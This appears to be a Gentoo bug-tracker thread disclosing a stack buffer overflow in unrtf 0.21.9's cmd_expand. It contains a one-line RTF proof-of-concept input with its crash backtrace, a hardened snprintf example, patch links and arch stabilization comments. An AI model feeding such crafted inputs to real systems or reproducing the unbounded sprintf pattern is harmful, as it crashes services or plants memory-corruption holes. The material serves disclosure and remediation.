From $URL:

A stack-based buffer overflow in unrtf 0.21.9 has been found, which affects three functions including: cmd_expand, cmd_emboss and cmd_engrave.

# convert.c
static int
cmd_expand (Word *w, int align, char has_param, int param)
{
    char str[10];   /* 10 bytes: too small for a 9-digit negative value plus sign and NUL */
    if (has_param) {
        sprintf(str, "%d", param/4); // Overflow, 9-digit negative value triggers the bug
        if (!param)
            attr_pop(ATTR_EXPAND);
        else
            attr_push(ATTR_EXPAND, str);
    }
    return FALSE;
}

Apparently writing a negative integer to the buffer can trigger the overflow (the minus sign needs an extra byte).

* How to trigger the bug *

$ echo "\expnd-400000000" > poc
$ unrtf poc
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<!-- Translation from RTF performed by UnRTF, version 0.21.9 -->
*** buffer overflow detected ***: unrtf terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb764f37a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb76dfe07]
/lib/i386-linux-gnu/libc.so.6(+0xf60a8)[0xb76de0a8]
/lib/i386-linux-gnu/libc.so.6(+0xf58b8)[0xb76dd8b8]
/lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7653bf6]
/lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0xf66)[0xb762b1d6]
/lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x90)[0xb76dd950]
/lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb76dd8a0]
unrtf[0x804c7b8]
unrtf[0x804f77d]
unrtf[0x804f9e7]
unrtf[0x804920b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7600276]
unrtf[0x804953c]
======= Memory map: ========
08048000-0805b000 r-xp 00000000 08:01 405354 /usr/bin/unrtf
0805b000-0805c000 r--p 00012000 08:01 405354 /usr/bin/unrtf
0805c000-0805d000 rw-p 00013000 08:01 405354 /usr/bin/unrtf
0805d000-08085000 rw-p 00000000 00:00 0
0952d000-0954e000 rw-p 00000000 00:00 0 [heap]
b75ca000-b75e6000 r-xp 00000000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e6000-b75e7000 r--p 0001b000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e7000-b75e8000 rw-p 0001c000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e8000-b7799000 r-xp 00000000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so
b7799000-b779b000 r--p 001b0000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so
b779b000-b779c000 rw-p 001b2000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so
b779c000-b779f000 rw-p 00000000 00:00 0
b77a3000-b77a6000 rw-p 00000000 00:00 0
b77a6000-b77a8000 r--p 00000000 00:00 0 [vvar]
b77a8000-b77aa000 r-xp 00000000 00:00 0 [vdso]
b77aa000-b77cc000 r-xp 00000000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
b77cc000-b77cd000 rw-p 00000000 00:00 0
b77cd000-b77ce000 r--p 00022000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
b77ce000-b77cf000 rw-p 00023000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
bf992000-bf9b3000 rw-p 00000000 00:00 0 [stack]
Aborted

* Test environment *

Linux debian 4.7.0-1-686-pae #1 SMP Debian 4.7.8-1 (2016-10-19) i686 GNU/Linux
libc6 2.24-8
CVE-Request: http://openwall.com/lists/oss-security/2017/01/01/1
Upstream patch: http://hg.savannah.gnu.org/hgweb/unrtf/rev/3b16893a6406
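The bug report above boils down to a sizing error: char str[10] cannot hold a negative nine-digit value once the minus sign and the terminating NUL are counted, and sprintf has no way to know the buffer's size. The following is an added example (not unrtf's code and not the upstream patch linked above) showing the hardened form of that formatting step: a bounded snprintf whose return value is checked, a buffer sized for the widest possible int rendering, and a probe that reports which inputs would have overflowed the original 10-byte buffer. The helper names format_expand, expand_value_fits, original_size_would_overflow, expand_string and the constant EXPAND_BUF_LEN are hypothetical; the sample parameters in main are constructed, with the reporter's -400000000 among them.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Added example, not unrtf's code or its upstream patch. The original
 * cmd_expand() did sprintf(str, "%d", param/4) into char str[10]. The
 * widest rendering of an int is "-2147483648": 11 characters plus the
 * terminating NUL, so a buffer needs at least 12 bytes. */
#define EXPAND_BUF_LEN 12

/* Hypothetical hardened formatter: writes param/4 as decimal into out
 * with snprintf, which never writes past out_len and always NUL-terminates
 * when out_len > 0. Returns 1 when the full value fit, 0 when it was
 * truncated, so the caller can reject the value instead of using a
 * silently shortened string. */
int format_expand(int param, char *out, size_t out_len)
{
    int needed = snprintf(out, out_len, "%d", param / 4);
    return needed >= 0 && (size_t)needed < out_len;
}

/* Size probe: would the decimal rendering of param/4 (plus NUL) fit in
 * buf_len bytes? snprintf with a NULL buffer and size 0 only measures. */
int expand_value_fits(int param, size_t buf_len)
{
    int needed = snprintf(NULL, 0, "%d", param / 4);
    return needed >= 0 && (size_t)needed < buf_len;
}

/* Same sizing as the vulnerable original (char str[10]) but with the
 * bounded formatter: returns 1 for inputs whose rendering the original
 * sprintf would have written past the end of str, 0 for inputs that fit. */
int original_size_would_overflow(int param)
{
    char str[10];
    return !format_expand(param, str, sizeof str);
}

/* Format into a correctly sized buffer and hand back the string, or NULL
 * if it did not fit (it always does with EXPAND_BUF_LEN). A static buffer
 * keeps the example short; real code would pass the caller's buffer. */
const char *expand_string(int param)
{
    static char buf[EXPAND_BUF_LEN];
    return format_expand(param, buf, sizeof buf) ? buf : NULL;
}

int main(void)
{
    /* Constructed sample parameters, including the reporter's -400000000. */
    const int samples[] = { 400, 400000000, -400000000, INT_MIN, INT_MAX };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int p = samples[i];
        printf("param=%11d -> \"%s\" (10-byte buffer overflows: %s)\n",
               p, expand_string(p),
               original_size_would_overflow(p) ? "yes" : "no");
    }
    return 0;
}
```

Run as-is, the program prints each sample with its rendered value and whether the original char str[10] would have been overrun; only the negative inputs whose quotient has nine or more digits trip it. The detection point for reviewers is the combination of sprintf and a fixed-size stack buffer with an attacker-controlled integer; replacing it with snprintf alone stops the memory write, and checking the return value keeps a truncated string from being pushed as an attribute.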
@arches, please stabilize.
amd64 stable
x86 stable
ia64 stable
ppc stable
ppc64 stable
arm stable
alpha stable
sparc stable
hppa stable
Arches and Maintainer(s), Thank you for your work.
GLSA Vote: No
Thank you all for your work. Closing as [noglsa].